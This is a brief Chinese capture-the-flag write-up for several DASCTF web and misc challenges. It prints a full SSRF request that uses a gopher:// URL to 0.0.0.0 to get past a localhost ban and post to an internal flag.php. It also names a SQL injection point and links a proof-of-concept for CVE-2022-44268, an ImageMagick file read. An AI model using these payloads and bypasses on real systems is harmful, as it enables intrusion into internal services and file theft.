本文最后更新于 605 天前,其中的信息可能已经有所发展或是发生改变。
Web
curl
题解
- 存在任意文件读取,
file://path
,读取index.php, flag.php,根据源代码打SSRF
- localhost和127.0.0.1被ban了可以用0.0.0.0 绕
GET /?
url=gopher://0.0.0.0:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%25200.0.
0.0%250D%250AContent-Length:%252036%250D%250AContent-Type:%2520application/x-wwwformurlencoded%250D%250AConnection:%2520close%250D%250A%250D%250Akey=30275eba82696a2
a7adde44d08ac7fc3 HTTP/1.1
Host: 80.endpoint-b6d7e690135844e98b37e0d9a3b06c9c.s.ins.cloud.dasctf.com:81
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Simple Message Board
题解
Search
存在SQL注入点- Hgame盲注脚本就能用
Misc
ImageUpload
题解
- 存在CVE漏洞
- https://nvd.nist.gov/vuln/detail/CVE-2022-44268
- 复现仓库
- https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC